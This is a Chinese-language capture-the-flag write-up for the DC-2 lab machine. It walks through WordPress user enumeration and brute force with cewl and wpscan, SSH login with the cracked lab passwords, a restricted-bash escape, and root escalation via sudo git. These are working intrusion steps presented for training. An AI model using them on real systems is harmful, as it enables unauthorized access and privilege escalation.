DC-2 渗透测试详细教学文档<\/h1>

1. 环境准备与初始信息收集<\/h2>

1.1 靶机IP扫描与DNS解析<\/h3>
问题：无法跟随重定向至http:\/\/dc-2\/，说明没有域名解析<\/li>
解决方案：配置本地hosts文件
# \/etc\/hosts
<靶机IP> dc-2
<\/code><\/pre>
<\/li>
<\/ul>
1.2 Flag 1获取<\/h3>
Flag 1内容<\/strong>：<\/p>
Your usual wordlists probably won't work, so instead, maybe you just need to be cewl.
More passwords is always better, but sometimes you just can't win them all.
Log in as one to see the next flag.
If you can't find it, log in as another.
<\/code><\/pre>
关键提示<\/strong>：<\/p>

需要使用cewl工具生成字典<\/li>
需要以不同用户身份登录<\/li>
<\/ul>
2. WordPress渗透<\/h2>
2.1 使用cewl生成密码字典<\/h3>

安装cewl：sudo apt install cewl<\/code><\/li>
基本用法：
cewl http:\/\/dc-2 -w passwd.txt
<\/span><\/span><\/code><\/pre><\/li>
高级选项：

-d <depth><\/code>：爬取深度，默认2<\/li>
-m <min_length><\/code>：最小单词长度，默认3<\/li>
--with-numbers<\/code>：包含带数字的单词<\/li>
-a<\/code>：包含元数据<\/li>
<\/ul>
<\/li>
<\/ul>
2.2 WordPress信息收集<\/h3>

识别CMS为WordPress 4.7.10<\/li>
扫描后台地址：通常为\/wp-admin<\/code>或\/wp-login.php<\/code><\/li>
<\/ul>
2.3 用户名枚举<\/h3>
使用wpscan进行用户名枚举：<\/p>
wpscan --url http:\/\/dc-2 -e u
<\/span><\/span><\/code><\/pre>2.4 密码爆破<\/h3>
方法一：使用BurpSuite<\/strong><\/p>

拦截登录请求<\/li>
发送到Intruder模块<\/li>
设置用户名和密码字典<\/li>
<\/ol>
方法二：使用wpscan<\/strong><\/p>
wpscan --url http:\/\/dc-2 --passwords passwd.txt --usernames user.txt
<\/span><\/span><\/code><\/pre>成功凭证<\/strong>：<\/p>

Username: jerry \/ Password: adipiscing<\/li>
Username: tom \/ Password: parturient<\/li>
<\/ul>
2.5 Flag 2获取<\/h3>
Flag 2内容<\/strong>：<\/p>
If you can't exploit WordPress and take a shortcut, there is another way.
Hope you found another entry point.
<\/code><\/pre>
关键提示<\/strong>：<\/p>

除了WordPress外，还有另一个入口点<\/li>
<\/ul>
3. SSH服务利用<\/h2>
3.1 端口扫描发现<\/h3>

发现7744端口运行SSH服务<\/li>
<\/ul>
3.2 使用tom账户登录<\/h3>
ssh tom@dc-2 -p 7744<\/span>
<\/span><\/span># 密码: parturient<\/span>
<\/span><\/span><\/code><\/pre>3.3 Flag 3获取<\/h3>
Flag 3内容<\/strong>：<\/p>
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
<\/code><\/pre>
关键提示<\/strong>：<\/p>

需要切换到jerry用户<\/li>
<\/ul>
4. rbash逃逸技术<\/h2>
4.1 识别rbash限制<\/h3>

发现cat等命令无法使用<\/li>
确认当前shell为受限bash<\/li>
<\/ul>
4.2 绕过rbash限制<\/h3>
BASH_CMDS[<\/span>a]=<\/span>\/bin\/sh;a
<\/span><\/span>export PATH=<\/span>$PATH:\/bin\/
<\/span><\/span>export PATH=<\/span>$PATH:\/usr\/bin
<\/span><\/span><\/code><\/pre>4.3 切换到jerry用户<\/h3>
su jerry
<\/span><\/span># 密码: adipiscing<\/span>
<\/span><\/span><\/code><\/pre>4.4 Flag 4获取<\/h3>
Flag 4内容<\/strong>：<\/p>
Good to see that you've made it this far - but you're not home yet. 
You still need to get the final flag (the only flag that really counts!!!). 
No hints here - you're on your own now. :-) 
Go on - git outta here!!!!
<\/code><\/pre>
关键提示<\/strong>：<\/p>

需要获取root权限<\/li>
提示使用git命令<\/li>
<\/ul>
5. 权限提升<\/h2>
5.1 检查sudo权限<\/h3>
sudo -l
<\/span><\/span># 发现jerry可以以root身份运行git<\/span>
<\/span><\/span><\/code><\/pre>5.2 利用git提权<\/h3>
sudo git -p help config
<\/span><\/span><\/code><\/pre>在显示的页面中输入：<\/p>
!\/bin\/bash
<\/code><\/pre>
5.3 Flag 5获取<\/h3>
Flag 5内容<\/strong>：<\/p>
Congratulatons!!!
A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.
If you enjoyed this CTF, send me a tweet via @DCAU7.
<\/code><\/pre>
6. 总结与关键步骤<\/h2>


初始访问<\/strong>：<\/p>

配置hosts文件<\/li>
使用cewl生成字典<\/li>
爆破WordPress登录<\/li>
<\/ul>
<\/li>

横向移动<\/strong>：<\/p>

通过SSH服务(7744端口)登录<\/li>
绕过rbash限制<\/li>
切换用户<\/li>
<\/ul>
<\/li>

权限提升<\/strong>：<\/p>

利用sudo git提权<\/li>
<\/ul>
<\/li>

关键工具<\/strong>：<\/p>

cewl<\/li>
wpscan<\/li>
BurpSuite<\/li>
SSH客户端<\/li>
<\/ul>
<\/li>

学习要点<\/strong>：<\/p>

自定义字典生成<\/li>
WordPress安全测试<\/li>
rbash逃逸技术<\/li>
sudo权限滥用提权<\/li>
<\/ul>
<\/li>
<\/ol>